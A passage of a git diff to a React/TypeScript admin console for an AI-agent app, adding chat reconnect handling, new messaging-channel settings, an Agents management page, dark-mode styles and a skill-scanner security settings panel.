headers, body: JSON.stringify(requestBody), signal: data.signal, }); }, - [], + [setChatStatus, setReconnectStreaming], ); const options = useMemo(() => { @@ -323,8 +445,18 @@ export default function ChatPage() { ...i18nConfig, theme: { ...defaultConfig.theme, + darkMode: isDark, + leftHeader: { + ...defaultConfig.theme.leftHeader, + }, rightHeader: , }, + welcome: { + ...i18nConfig.welcome, + avatar: isDark + ? `${import.meta.env.BASE_URL}copaw-dark.png` + : `${import.meta.env.BASE_URL}copaw-symbol.svg`, + }, sender: { ...(i18nConfig as any)?.sender, beforeSubmit: handleBeforeSubmit, @@ -334,7 +466,17 @@ export default function ChatPage() { ...defaultConfig.api, fetch: customFetch, cancel(data: { session_id: string }) { - console.log(data); + const chatIdForStop = data?.session_id + ? sessionApi.getRealIdForSession(data.session_id) ?? data.session_id + : ""; + if (chatIdForStop) { + chatApi.stopConsoleChat(chatIdForStop).then( + () => setChatStatus("idle"), + (err) => { + console.error("stopConsoleChat failed:", err); + }, + ); + } }, }, actions: { @@ -356,11 +498,24 @@ export default function ChatPage() { "weather search mock": Weather, }, } as unknown as IAgentScopeRuntimeWebUIOptions; - }, [wrappedSessionApi, customFetch, copyResponse, t]); + }, [wrappedSessionApi, customFetch, copyResponse, t, isDark]); return ( -
    - +
    +
    + +
    ; /** Real backend UUID, used when id is overridden with a local timestamp. */ realId?: string; + /** Conversation status: idle or running (for reconnect). */ + status?: "idle" | "running"; } // --------------------------------------------------------------------------- @@ -190,6 +195,7 @@ const chatSpecToSession = (chat: ChatSpec): ExtendedSession => channel: chat.channel, messages: [], meta: chat.meta || {}, + status: chat.status ?? "idle", }) as ExtendedSession; /** Returns true when id is a pure numeric local timestamp (not a backend UUID). */ @@ -257,6 +263,35 @@ class SessionApi implements IAgentScopeRuntimeWebUISessionAPI { */ onSessionRemoved: ((removedId: string) => void) | null = null; + /** + * Ref to the chat component so we can trigger submit with reconnect flag + * (library will call customFetch with biz_params.reconnect and consume the SSE stream). + */ + private chatRef: RefObject | null = null; + + setChatRef(ref: RefObject | null): void { + this.chatRef = ref; + } + + /** + * Programmatically trigger the library's submit with biz_params.reconnect so + * customFetch does POST /console/chat with reconnect:true and the library + * consumes the SSE stream (replay + live tail). 
+ */ + triggerReconnectSubmit(): void { + const ref = this.chatRef?.current; + if (!ref?.input?.submit) { + console.warn("triggerReconnectSubmit: chatRef not available"); + return; + } + ref.input.submit({ + query: "", + biz_params: { + reconnect: true, + } as IAgentScopeRuntimeWebUIInputData["biz_params"], + }); + } + private createEmptySession(sessionId: string): ExtendedSession { window.currentSessionId = sessionId; window.currentUserId = DEFAULT_USER_ID; @@ -342,7 +377,11 @@ class SessionApi implements IAgentScopeRuntimeWebUISessionAPI { this.sessionRequests.set(sessionId, requestPromise); try { - return await requestPromise; + const result = await requestPromise; + // Reconnect for running sessions is triggered by ChatPage when session + // status becomes "running" (useEffect on chatStatus), avoiding a fixed + // timeout and race conditions with the chat input ref. + return result; } finally { this.sessionRequests.delete(sessionId); } @@ -369,6 +408,7 @@ class SessionApi implements IAgentScopeRuntimeWebUISessionAPI { messages: convertMessages(chatHistory.messages || []), meta: fromList.meta || {}, realId: fromList.realId, + status: chatHistory.status ?? "idle", }; this.updateWindowVariables(session); return session; @@ -404,6 +444,7 @@ class SessionApi implements IAgentScopeRuntimeWebUISessionAPI { messages: convertMessages(chatHistory.messages || []), meta: refreshed.meta || {}, realId: refreshed.realId, + status: chatHistory.status ?? "idle", }; this.updateWindowVariables(session); return session; @@ -434,6 +475,7 @@ class SessionApi implements IAgentScopeRuntimeWebUISessionAPI { channel: fromList?.channel || DEFAULT_CHANNEL, messages: convertMessages(chatHistory.messages || []), meta: fromList?.meta || {}, + status: chatHistory.status ?? 
"idle", }; this.updateWindowVariables(session); diff --git a/console/src/pages/Control/Channels/components/ChannelDrawer.tsx b/console/src/pages/Control/Channels/components/ChannelDrawer.tsx index 193ea0666..dab930490 100644 --- a/console/src/pages/Control/Channels/components/ChannelDrawer.tsx +++ b/console/src/pages/Control/Channels/components/ChannelDrawer.tsx @@ -19,8 +19,10 @@ const CHANNELS_WITH_ACCESS_CONTROL: ChannelKey[] = [ "dingtalk", "discord", "feishu", + "wecom", "mattermost", "matrix", + "xiaoyi", ]; interface ChannelDrawerProps { @@ -35,20 +37,41 @@ interface ChannelDrawerProps { onSubmit: (values: Record) => void; } -// Doc URLs per channel (anchors on https://copaw.agentscope.io/docs/channels) -const CHANNEL_DOC_URLS: Partial> = { +// Doc EN URLs per channel (anchors on https://copaw.agentscope.io/docs/channels) +const CHANNEL_DOC_EN_URLS: Partial> = { dingtalk: - "https://copaw.agentscope.io/docs/channels/#%E9%92%89%E9%92%89%E6%8E%A8%E8%8D%90", - feishu: "https://copaw.agentscope.io/docs/channels/#%E9%A3%9E%E4%B9%A6", + "https://copaw.agentscope.io/docs/channels/?lang=en#DingTalk-recommended", + feishu: "https://copaw.agentscope.io/docs/channels/?lang=en#Feishu-Lark", imessage: - "https://copaw.agentscope.io/docs/channels/#iMessage%E4%BB%85-macOS", - discord: "https://copaw.agentscope.io/docs/channels/#Discord", - qq: "https://copaw.agentscope.io/docs/channels/#QQ", - telegram: "https://copaw.agentscope.io/docs/channels/#Telegram", - mqtt: "https://copaw.agentscope.io/docs/channels/#MQTT", - mattermost: "https://copaw.agentscope.io/docs/channels/#Mattermost", - matrix: "https://copaw.agentscope.io/docs/channels/#Matrix", + "https://copaw.agentscope.io/docs/channels/?lang=en#iMessage-macOS-only", + discord: "https://copaw.agentscope.io/docs/channels/?lang=en#Discord", + qq: "https://copaw.agentscope.io/docs/channels/?lang=en#QQ", + telegram: "https://copaw.agentscope.io/docs/channels/?lang=en#Telegram", + mqtt: 
"https://copaw.agentscope.io/docs/channels/?lang=en#MQTT", + mattermost: "https://copaw.agentscope.io/docs/channels/?lang=en#Mattermost", + matrix: "https://copaw.agentscope.io/docs/channels/?lang=en#Matrix", + wecom: "https://copaw.agentscope.io/docs/channels/?lang=en#WeCom-WeChat-Work", + xiaoyi: + "https://developer.huawei.com/consumer/cn/doc/service/openclaw-0000002518410344", }; + +// Doc ZH URLs per channel (anchors on https://copaw.agentscope.io/docs/channels) +const CHANNEL_DOC_ZH_URLS: Partial> = { + dingtalk: "https://copaw.agentscope.io/docs/channels/?lang=zh#钉钉推荐", + feishu: "https://copaw.agentscope.io/docs/channels/?lang=zh#飞书", + imessage: + "https://copaw.agentscope.io/docs/channels/?lang=zh#iMessage仅-macOS", + discord: "https://copaw.agentscope.io/docs/channels/?lang=zh#Discord", + qq: "https://copaw.agentscope.io/docs/channels/?lang=zh#QQ", + telegram: "https://copaw.agentscope.io/docs/channels/?lang=zh#Telegram", + mqtt: "https://copaw.agentscope.io/docs/channels/?lang=zh#MQTT", + mattermost: "https://copaw.agentscope.io/docs/channels/?lang=zh#Mattermost", + matrix: "https://copaw.agentscope.io/docs/channels/?lang=zh#Matrix", + wecom: "https://copaw.agentscope.io/docs/channels/?lang=zh#企业微信", + xiaoyi: + "https://developer.huawei.com/consumer/cn/doc/service/openclaw-0000002518410344", +}; + const twilioConsoleUrl = "https://console.twilio.com"; export function ChannelDrawer({ @@ -62,7 +85,8 @@ export function ChannelDrawer({ onClose, onSubmit, }: ChannelDrawerProps) { - const { t } = useTranslation(); + const { t, i18n } = useTranslation(); + const currentLang = i18n.language?.startsWith("zh") ? "zh" : "en"; const label = activeKey ? 
getChannelLabel(activeKey) : activeLabel; const renderAccessControlFields = () => ( @@ -189,6 +213,60 @@ export function ChannelDrawer({ + + + + + + + + + + + ); + }} + ); case "feishu": @@ -434,6 +512,70 @@ export function ChannelDrawer({ ); + case "wecom": + return ( + <> + + + + + + + + + + + + + + ); + case "xiaoyi": + return ( + <> + + + + + + + + + + + + + + + ); default: return null; } @@ -494,17 +636,32 @@ export function ChannelDrawer({ ? `${label} ${t("channels.settings")}` : t("channels.channelSettings")} - {activeKey && CHANNEL_DOC_URLS[activeKey] && ( - - )} + {activeKey && + CHANNEL_DOC_EN_URLS[activeKey] && + CHANNEL_DOC_ZH_URLS[activeKey] && ( + + )} {activeKey === "voice" && ( + + + +
    + ); +} diff --git a/console/src/pages/Settings/Agents/components/AgentModal.tsx b/console/src/pages/Settings/Agents/components/AgentModal.tsx new file mode 100644 index 000000000..8decbd0f2 --- /dev/null +++ b/console/src/pages/Settings/Agents/components/AgentModal.tsx @@ -0,0 +1,68 @@ +import { Modal, Form, Input } from "antd"; +import { useTranslation } from "react-i18next"; +import type { AgentSummary } from "@/api/types/agents"; + +interface AgentModalProps { + open: boolean; + editingAgent: AgentSummary | null; + form: ReturnType[0]; + onSave: () => Promise; + onCancel: () => void; +} + +export function AgentModal({ + open, + editingAgent, + form, + onSave, + onCancel, +}: AgentModalProps) { + const { t } = useTranslation(); + + return ( + +
    + {editingAgent && ( + + + + )} + + + + + + + + + +
    +
    + ); +} diff --git a/console/src/pages/Settings/Agents/components/AgentTable.tsx b/console/src/pages/Settings/Agents/components/AgentTable.tsx new file mode 100644 index 000000000..ab5677d54 --- /dev/null +++ b/console/src/pages/Settings/Agents/components/AgentTable.tsx @@ -0,0 +1,123 @@ +import { Table, Button, Space, Popconfirm } from "antd"; +import type { ColumnsType } from "antd/es/table"; +import { useTranslation } from "react-i18next"; +import { EditOutlined, DeleteOutlined, RobotOutlined } from "@ant-design/icons"; +import type { AgentSummary } from "../../../../api/types/agents"; +import { useTheme } from "../../../../contexts/ThemeContext"; +import styles from "../index.module.less"; + +interface AgentTableProps { + agents: AgentSummary[]; + loading: boolean; + onEdit: (agent: AgentSummary) => void; + onDelete: (agentId: string) => void; +} + +export function AgentTable({ + agents, + loading, + onEdit, + onDelete, +}: AgentTableProps) { + const { t } = useTranslation(); + const { isDark } = useTheme(); + + // Inline style for disabled buttons — CSS cannot reliably override AntD's disabled styles + const disabledStyle: React.CSSProperties = isDark + ? { color: "rgba(255,255,255,0.35)", opacity: 1 } + : {}; + + const columns: ColumnsType = [ + { + title: t("agent.name"), + dataIndex: "name", + key: "name", + render: (text: string) => ( + + + {text} + + ), + }, + { + title: t("agent.id"), + dataIndex: "id", + key: "id", + }, + { + title: t("agent.description"), + dataIndex: "description", + key: "description", + ellipsis: true, + }, + { + title: t("agent.workspace"), + dataIndex: "workspace_dir", + key: "workspace_dir", + ellipsis: true, + }, + { + title: t("common.actions"), + key: "actions", + width: 200, + render: (_: any, record: AgentSummary) => ( + + + onDelete(record.id)} + disabled={record.id === "default"} + okText={t("common.confirm")} + cancelText={t("common.cancel")} + > + + + + ), + }, + ]; + + return ( +
    + + + ); +} diff --git a/console/src/pages/Settings/Agents/components/PageHeader.tsx b/console/src/pages/Settings/Agents/components/PageHeader.tsx new file mode 100644 index 000000000..e00014733 --- /dev/null +++ b/console/src/pages/Settings/Agents/components/PageHeader.tsx @@ -0,0 +1,27 @@ +import styles from "../index.module.less"; + +interface PageHeaderProps { + title: string; + description?: string; + className?: string; + action?: React.ReactNode; +} + +export function PageHeader({ + title, + description, + className, + action, +}: PageHeaderProps) { + return ( +
+    <div className={className}>
+      <div>
+        <h2 className={styles.sectionTitle}>{title}</h2>
+        {description && (
+          <p className={styles.sectionDesc}>{description}</p>
+        )}
+      </div>
+      {action && <div>{action}</div>}
+    </div>
    + ); +} diff --git a/console/src/pages/Settings/Agents/components/index.ts b/console/src/pages/Settings/Agents/components/index.ts new file mode 100644 index 000000000..47e43d99b --- /dev/null +++ b/console/src/pages/Settings/Agents/components/index.ts @@ -0,0 +1,3 @@ +export { PageHeader } from "./PageHeader"; +export { AgentTable } from "./AgentTable"; +export { AgentModal } from "./AgentModal"; diff --git a/console/src/pages/Settings/Agents/index.module.less b/console/src/pages/Settings/Agents/index.module.less new file mode 100644 index 000000000..355d6fba1 --- /dev/null +++ b/console/src/pages/Settings/Agents/index.module.less @@ -0,0 +1,72 @@ +.agentsPage { + padding: 24px; +} + +/* ---- Section (same as Models / Environments) ---- */ + +.section { + margin-bottom: 24px; + display: flex; + justify-content: space-between; + align-items: center; +} + +.section:last-child { + margin-bottom: 0; +} + +.sectionTitle { + margin: 0; + font-size: 24px; + font-weight: 600; +} + +.sectionDesc { + color: #999; + font-size: 14px; +} + +/* ---- Table Card ---- */ + +.tableCard { + margin-bottom: 24px; + + &:last-child { + margin-bottom: 0; + } +} + +/* ─── Dark mode ─────────────────────────────────────────────────────────────── */ +:global(.dark-mode) { + .sectionTitle { + color: rgba(255, 255, 255, 0.85); + } + + .sectionDesc { + color: rgba(255, 255, 255, 0.35); + } +} + +/* Link buttons in table — must be flat global selectors to beat AntD specificity */ +:global(.dark-mode .ant-btn-link) { + color: #8b87f0 !important; + + &:global(:hover) { + color: #a5a2f5 !important; + } +} + +:global(.dark-mode .ant-btn-link.ant-btn-dangerous) { + color: #ff7875 !important; + + &:global(:hover) { + color: #ff9c9a !important; + } +} + +:global(.dark-mode .ant-btn-link:disabled), +:global(.dark-mode .ant-btn-link.ant-btn-disabled), +:global(.dark-mode .ant-btn-link[disabled]) { + color: rgba(255, 255, 255, 0.35) !important; + opacity: 1 !important; +} diff --git 
a/console/src/pages/Settings/Agents/index.tsx b/console/src/pages/Settings/Agents/index.tsx new file mode 100644 index 000000000..1d29e633d --- /dev/null +++ b/console/src/pages/Settings/Agents/index.tsx @@ -0,0 +1,97 @@ +import { useState } from "react"; +import { Card, Button, Form, message } from "antd"; +import { PlusOutlined } from "@ant-design/icons"; +import { useTranslation } from "react-i18next"; +import { agentsApi } from "../../../api/modules/agents"; +import type { AgentSummary } from "../../../api/types/agents"; +import { useAgents } from "./useAgents"; +import { PageHeader, AgentTable, AgentModal } from "./components"; +import styles from "./index.module.less"; + +export default function AgentsPage() { + const { t } = useTranslation(); + const { agents, loading, deleteAgent } = useAgents(); + const [modalVisible, setModalVisible] = useState(false); + const [editingAgent, setEditingAgent] = useState(null); + const [form] = Form.useForm(); + + const handleCreate = () => { + setEditingAgent(null); + form.resetFields(); + form.setFieldsValue({ + workspace_dir: "", + }); + setModalVisible(true); + }; + + const handleEdit = async (agent: AgentSummary) => { + try { + const config = await agentsApi.getAgent(agent.id); + setEditingAgent(agent); + form.setFieldsValue(config); + setModalVisible(true); + } catch (error) { + console.error("Failed to load agent config:", error); + message.error(t("agent.loadConfigFailed")); + } + }; + + const handleDelete = async (agentId: string) => { + try { + await deleteAgent(agentId); + } catch { + // Error already handled in hook + message.error(t("agent.deleteFailed")); + } + }; + + const handleSubmit = async () => { + try { + const values = await form.validateFields(); + + if (editingAgent) { + await agentsApi.updateAgent(editingAgent.id, values); + message.success(t("agent.updateSuccess")); + } else { + const result = await agentsApi.createAgent(values); + message.success(`${t("agent.createSuccess")} (ID: ${result.id})`); 
+ } + + setModalVisible(false); + } catch (error: any) { + console.error("Failed to save agent:", error); + message.error(error.message || t("agent.saveFailed")); + } + }; + + return ( +
    + } onClick={handleCreate}> + {t("agent.create")} + + } + /> + + + + + + setModalVisible(false)} + /> +
    + ); +} diff --git a/console/src/pages/Settings/Agents/useAgents.ts b/console/src/pages/Settings/Agents/useAgents.ts new file mode 100644 index 000000000..1faebaea5 --- /dev/null +++ b/console/src/pages/Settings/Agents/useAgents.ts @@ -0,0 +1,63 @@ +import { useState, useEffect } from "react"; +import { message } from "antd"; +import { useTranslation } from "react-i18next"; +import { agentsApi } from "@/api/modules/agents"; +import type { AgentSummary } from "@/api/types/agents"; +import { useAgentStore } from "@/stores/agentStore"; + +interface UseAgentsReturn { + agents: AgentSummary[]; + loading: boolean; + error: Error | null; + loadAgents: () => Promise; + deleteAgent: (agentId: string) => Promise; +} + +export function useAgents(): UseAgentsReturn { + const { t } = useTranslation(); + const [agents, setAgents] = useState([]); + const [loading, setLoading] = useState(false); + const [error, setError] = useState(null); + const { setAgents: updateStoreAgents } = useAgentStore(); + + const loadAgents = async () => { + setLoading(true); + setError(null); + try { + const data = await agentsApi.listAgents(); + setAgents(data.agents); + updateStoreAgents(data.agents); + } catch (err) { + console.error("Failed to load agents:", err); + const errorMsg = + err instanceof Error ? 
err : new Error(t("agent.loadFailed")); + setError(errorMsg); + message.error(t("agent.loadFailed")); + } finally { + setLoading(false); + } + }; + + const deleteAgent = async (agentId: string) => { + try { + await agentsApi.deleteAgent(agentId); + message.success(t("agent.deleteSuccess")); + await loadAgents(); + } catch (err: any) { + message.error(err.message || t("agent.deleteFailed")); + throw err; + } + }; + + useEffect(() => { + loadAgents(); + }, []); + + return { + agents, + loading, + error, + loadAgents, + deleteAgent, + }; +} diff --git a/console/src/pages/Settings/Environments/index.module.less b/console/src/pages/Settings/Environments/index.module.less index 9ea1be333..f588be21e 100644 --- a/console/src/pages/Settings/Environments/index.module.less +++ b/console/src/pages/Settings/Environments/index.module.less @@ -376,3 +376,153 @@ font-size: 32px; opacity: 0.6; } + +/* ─── Dark mode ─────────────────────────────────────────────────────────────── */ +:global(.dark-mode) { + .sectionDesc { + color: rgba(255, 255, 255, 0.35); + } + + .stateText { + color: rgba(255, 255, 255, 0.35); + } + + /* Main card */ + .tableCard { + background: #1f1f1f; + border-color: rgba(255, 255, 255, 0.1); + box-shadow: 0 2px 8px rgba(0, 0, 0, 0.3); + + &:hover { + box-shadow: 0 4px 16px rgba(0, 0, 0, 0.4); + border-color: rgba(255, 255, 255, 0.15); + } + } + + /* Toolbar */ + .toolbar { + background: rgba(255, 255, 255, 0.03); + border-bottom-color: rgba(255, 255, 255, 0.08); + + &:hover { + background: rgba(255, 255, 255, 0.05); + } + } + + .toolbarCount { + color: rgba(255, 255, 255, 0.35); + } + + /* Env row */ + .envRow { + border-bottom-color: rgba(255, 255, 255, 0.06); + + &:hover { + background: rgba(255, 255, 255, 0.04); + } + } + + .envRowSelected { + background: rgba(22, 119, 255, 0.12); + border-left-color: #4096ff; + + &:hover { + background: rgba(22, 119, 255, 0.18); + } + } + + /* Input group (Key / Value outer frame) */ + .inputGroup { + border-color: rgba(255, 255,
255, 0.12); + background: #2a2a2a; + + &:focus-within { + border-color: #615ced; + box-shadow: 0 0 0 2px rgba(97, 92, 237, 0.2); + } + } + + /* Key / Value labels */ + .inputLabel { + color: rgba(255, 255, 255, 0.4); + border-right-color: rgba(255, 255, 255, 0.08); + background: rgba(255, 255, 255, 0.04); + + .inputGroup:focus-within & { + color: #8b87f0; + background: rgba(97, 92, 237, 0.1); + } + } + + /* Input field inside group */ + .inputField { + color: rgba(255, 255, 255, 0.85); + + &::placeholder { + color: rgba(255, 255, 255, 0.2); + } + + :global(.ant-input), + :global(.copaw-input) { + color: rgba(255, 255, 255, 0.85) !important; + background: transparent !important; + + &::placeholder { + color: rgba(255, 255, 255, 0.2) !important; + } + } + } + + /* Password toggle */ + .passwordToggle { + color: rgba(255, 255, 255, 0.3); + + &:hover { + color: #8b87f0; + background: rgba(97, 92, 237, 0.12); + } + } + + /* Row action icons */ + .rowIconBtn { + color: rgba(255, 255, 255, 0.2); + + &:hover { + color: #8b87f0; + background: rgba(97, 92, 237, 0.12); + } + } + + .rowIconBtnDanger { + &:hover { + color: #ff7875; + background: rgba(255, 77, 79, 0.12); + } + } + + /* Add bar */ + .addBar { + background: rgba(255, 255, 255, 0.02); + border-top-color: rgba(255, 255, 255, 0.08); + + &:hover { + background: rgba(255, 255, 255, 0.04); + } + } + + .addBtn { + border-color: rgba(255, 255, 255, 0.15); + color: rgba(255, 255, 255, 0.35); + + &:hover { + color: #8b87f0; + border-color: #615ced; + background: rgba(97, 92, 237, 0.1); + } + } + + /* Empty state */ + .emptyState { + color: rgba(255, 255, 255, 0.2); + } +} diff --git a/console/src/pages/Settings/Models/index.module.less b/console/src/pages/Settings/Models/index.module.less index 0b6da499a..4bd0e2596 100644 --- a/console/src/pages/Settings/Models/index.module.less +++ b/console/src/pages/Settings/Models/index.module.less @@ -28,7 +28,7 @@ } .sectionDesc { - margin: 0 0 16px; + margin: 0 0 24px; color: #999;
font-size: 14px; } @@ -69,7 +69,7 @@ .providerCard { flex: 1 1 calc(33.333% - 16px); - min-width: 280px; + min-width: 432px; border-radius: 16px; transition: all 0.2s ease-in-out; cursor: pointer; @@ -516,3 +516,156 @@ border-radius: 8px; border: 1px dashed #d9d9d9; } + +/* ─── Dark mode ─────────────────────────────────────────────────────────────── */ +:global(.dark-mode) { + .loadingText { + color: rgba(255, 255, 255, 0.35); + } + + .sectionDesc { + color: rgba(255, 255, 255, 0.35); + } + + .providerGroupTitle { + color: rgba(255, 255, 255, 0.4); + } + + /* Provider card */ + .providerCard { + background: #2a2a2a; + + &.normal { + border-color: rgba(255, 255, 255, 0.08) !important; + box-shadow: 0 4px 12px rgba(0, 0, 0, 0.3) !important; + } + + &.hover { + border-color: #615ced !important; + box-shadow: 0 12px 32px rgba(0, 0, 0, 0.4) !important; + } + } + + .cardName { + color: rgba(255, 255, 255, 0.85); + } + + .infoRow { + color: rgba(255, 255, 255, 0.5); + } + + .infoLabel { + color: rgba(255, 255, 255, 0.3); + } + + .infoValue { + color: rgba(255, 255, 255, 0.65); + } + + .infoEmpty { + color: rgba(255, 255, 255, 0.2); + } + + .cardActions { + border-top-color: rgba(255, 255, 255, 0.08); + } + + .configBtn { + color: rgba(255, 255, 255, 0.55); + } + + .statusContainer .statusText.disabled { + color: rgba(255, 255, 255, 0.3); + } + + /* Slot section (LLM top selection area) */ + .slotSection { + background: #2a2a2a; + border-color: rgba(255, 255, 255, 0.08); + box-shadow: 0 2px 8px rgba(0, 0, 0, 0.3); + + &:hover { + box-shadow: 0 4px 16px rgba(0, 0, 0, 0.4); + border-color: rgba(255, 255, 255, 0.15); + } + } + + .slotHeader { + border-bottom-color: rgba(255, 255, 255, 0.08); + } + + .slotTitle { + color: rgba(255, 255, 255, 0.85); + } + + .slotCurrent { + color: #52c41a; + background: rgba(82, 196, 26, 0.1); + border-color: rgba(82, 196, 26, 0.3); + } + + .slotLabel { + color: rgba(255, 255, 255, 0.5); + } + + .slotActions { + border-top-color: rgba(255, 255, 255, 0.08);
+ } + + /* Advanced config */ + .advancedConfigSection { + border-top-color: rgba(255, 255, 255, 0.08); + } + + .advancedConfigToggle { + color: rgba(255, 255, 255, 0.65); + } + + /* JSON editor */ + .jsonEditorContainer { + border-color: rgba(255, 255, 255, 0.15); + background: #1a1a1a; + + &:focus-within { + border-color: #615ced; + } + } + + .jsonEditorHighlight { + color: rgba(255, 255, 255, 0.45); + } + + .jsonEditorTextarea { + caret-color: rgba(255, 255, 255, 0.85); + } + + /* Model list (modal) */ + .modelList { + border-color: rgba(255, 255, 255, 0.08); + } + + .modelListEmpty { + color: rgba(255, 255, 255, 0.3); + } + + .modelListItem { + border-bottom-color: rgba(255, 255, 255, 0.06); + + &:hover { + background: rgba(255, 255, 255, 0.04); + } + } + + .modelListItemName { + color: rgba(255, 255, 255, 0.85); + } + + .modelListItemId { + color: rgba(255, 255, 255, 0.3); + } + + .modelAddForm { + background: rgba(255, 255, 255, 0.03); + border-color: rgba(255, 255, 255, 0.12); + } +} diff --git a/console/src/pages/Settings/Models/index.tsx b/console/src/pages/Settings/Models/index.tsx index 90b507c0c..8eda32bda 100644 --- a/console/src/pages/Settings/Models/index.tsx +++ b/console/src/pages/Settings/Models/index.tsx @@ -6,7 +6,6 @@ import { PageHeader, LoadingState, ProviderCard, - ModelsSection, CustomProviderModal, } from "./components"; import { useTranslation } from "react-i18next"; @@ -64,18 +63,7 @@ function ModelsPage() { ) : ( <> - {/* ---- LLM Section (top) ---- */} - - - - {/* ---- Providers Section (below) ---- */} + {/* ---- Providers Section ---- */}
    ([]); @@ -9,6 +10,7 @@ export function useProviders() { ); const [loading, setLoading] = useState(true); const [error, setError] = useState(null); + const { selectedAgent } = useAgentStore(); const fetchAll = useCallback(async (showLoading = true) => { if (showLoading) { @@ -41,7 +43,7 @@ export function useProviders() { useEffect(() => { fetchAll(); - }, [fetchAll]); + }, [fetchAll, selectedAgent]); return { providers, diff --git a/console/src/pages/Settings/Security/components/RuleModal.tsx b/console/src/pages/Settings/Security/components/RuleModal.tsx index af64826aa..e6cd46fc8 100644 --- a/console/src/pages/Settings/Security/components/RuleModal.tsx +++ b/console/src/pages/Settings/Security/components/RuleModal.tsx @@ -19,6 +19,7 @@ const BUILTIN_TOOLS = [ "execute_python_code", "browser_use", "desktop_screenshot", + "view_image", "read_file", "write_file", "edit_file", diff --git a/console/src/pages/Settings/Security/components/SkillScannerSection.tsx b/console/src/pages/Settings/Security/components/SkillScannerSection.tsx new file mode 100644 index 000000000..555e0e512 --- /dev/null +++ b/console/src/pages/Settings/Security/components/SkillScannerSection.tsx @@ -0,0 +1,462 @@ +import { useState, useCallback } from "react"; +import { + Card, + InputNumber, + Table, + Tag, + Button, + Modal, + message, + Tooltip, + Empty, + Tabs, +} from "@agentscope-ai/design"; +import { Select, Space } from "antd"; +import { Trash2, ShieldCheck, Eye } from "lucide-react"; +import { useTranslation } from "react-i18next"; +import { useSkillScanner } from "../useSkillScanner"; +import type { + BlockedSkillRecord, + BlockedSkillFinding, + SkillScannerWhitelistEntry, + SkillScannerMode, +} from "../../../../api/modules/security"; +import { skillApi } from "../../../../api/modules/skill"; +import { useTheme } from "../../../../contexts/ThemeContext"; +import styles from "../index.module.less"; + +function FindingsModal({ + findings, + skillName, + open, + onClose, +}: { + 
findings: BlockedSkillFinding[]; + skillName: string; + open: boolean; + onClose: () => void; +}) { + const { t } = useTranslation(); + + return ( + +
    String(idx)} + pagination={false} + size="small" + columns={[ + { + title: "Title", + dataIndex: "title", + key: "title", + width: 200, + }, + { + title: "File", + key: "location", + width: 160, + render: (_: unknown, record: BlockedSkillFinding) => + record.line_number + ? `${record.file_path}:${record.line_number}` + : record.file_path, + }, + { + title: "Description", + dataIndex: "description", + key: "description", + ellipsis: true, + }, + ]} + /> + + ); +} + +export function SkillScannerSection() { + const { t } = useTranslation(); + const { isDark } = useTheme(); + const darkBtnStyle = isDark ? { color: "rgba(255,255,255,0.75)" } : undefined; + const { + config, + blockedHistory, + whitelist, + loading, + updateConfig, + addToWhitelist, + removeFromWhitelist, + removeBlockedEntry, + clearBlockedHistory, + } = useSkillScanner(); + + const [saving, setSaving] = useState(false); + const [findingsModal, setFindingsModal] = useState<{ + open: boolean; + findings: BlockedSkillFinding[]; + skillName: string; + }>({ open: false, findings: [], skillName: "" }); + + const handleModeChange = useCallback( + async (mode: SkillScannerMode) => { + setSaving(true); + const ok = await updateConfig({ mode }); + if (ok) message.success(t("security.skillScanner.saveSuccess")); + else message.error(t("security.skillScanner.saveFailed")); + setSaving(false); + }, + [updateConfig, t], + ); + + const [pendingTimeout, setPendingTimeout] = useState(null); + + const handleTimeoutBlur = useCallback(async () => { + const value = pendingTimeout; + if (value === null || value < 5 || value > 300) { + setPendingTimeout(null); + return; + } + setSaving(true); + const ok = await updateConfig({ timeout: value }); + if (ok) message.success(t("security.skillScanner.saveSuccess")); + else message.error(t("security.skillScanner.saveFailed")); + setPendingTimeout(null); + setSaving(false); + }, [pendingTimeout, updateConfig, t]); + + const handleAllowSkill = useCallback( + async (record: 
BlockedSkillRecord, index: number) => { + const ok = await addToWhitelist(record.skill_name, record.content_hash); + if (ok) { + message.success(t("security.skillScanner.whitelist.addSuccess")); + await removeBlockedEntry(index); + } else { + message.error(t("security.skillScanner.whitelist.addFailed")); + } + }, + [addToWhitelist, removeBlockedEntry, t], + ); + + const handleRemoveWhitelist = useCallback( + async (skillName: string) => { + Modal.confirm({ + title: t("security.skillScanner.whitelist.removeConfirm"), + content: t("security.skillScanner.whitelist.removeWillDisable"), + onOk: async () => { + const ok = await removeFromWhitelist(skillName); + if (!ok) { + message.error(t("security.skillScanner.whitelist.removeFailed")); + return; + } + try { + await skillApi.disableSkill(skillName); + message.success( + t("security.skillScanner.whitelist.removeAndDisabled"), + ); + } catch { + message.success(t("security.skillScanner.whitelist.removeSuccess")); + } + }, + }); + }, + [removeFromWhitelist, t], + ); + + const handleClearHistory = useCallback(() => { + Modal.confirm({ + title: t("security.skillScanner.scanAlerts.clearConfirm"), + onOk: async () => { + await clearBlockedHistory(); + }, + }); + }, [clearBlockedHistory, t]); + + if (loading || !config) return null; + + const enabled = config.mode !== "off"; + + const blockedColumns = [ + { + title: t("security.skillScanner.scanAlerts.skillName"), + dataIndex: "skill_name", + key: "skill_name", + width: 180, + }, + { + title: t("security.skillScanner.scanAlerts.action"), + dataIndex: "action", + key: "action", + width: 100, + render: (action: string) => ( + + {action === "blocked" + ? 
t("security.skillScanner.scanAlerts.actionBlocked") + : t("security.skillScanner.scanAlerts.actionWarned")} + + ), + }, + { + title: t("security.skillScanner.scanAlerts.time"), + dataIndex: "blocked_at", + key: "blocked_at", + width: 180, + render: (val: string) => { + try { + return new Date(val).toLocaleString(); + } catch { + return val; + } + }, + }, + { + title: t("security.skillScanner.scanAlerts.actions"), + key: "actions", + width: 200, + render: (_: unknown, record: BlockedSkillRecord, index: number) => ( + + + + + + + + + + + + ), + }, + ]; + + const whitelistColumns = [ + { + title: t("security.skillScanner.whitelist.skillName"), + dataIndex: "skill_name", + key: "skill_name", + width: 200, + }, + { + title: t("security.skillScanner.whitelist.contentHash"), + dataIndex: "content_hash", + key: "content_hash", + width: 200, + ellipsis: true, + render: (hash: string) => + hash ? ( + + {hash.substring(0, 16)}... + + ) : ( + any + ), + }, + { + title: t("security.skillScanner.whitelist.addedAt"), + dataIndex: "added_at", + key: "added_at", + width: 180, + render: (val: string) => { + try { + return new Date(val).toLocaleString(); + } catch { + return val; + } + }, + }, + { + title: t("security.skillScanner.whitelist.actions"), + key: "actions", + width: 100, + render: (_: unknown, record: SkillScannerWhitelistEntry) => ( + + + + ), + }, + ]; + + return ( + <> + +
    +
    + + + {t("security.skillScanner.mode")} + + +
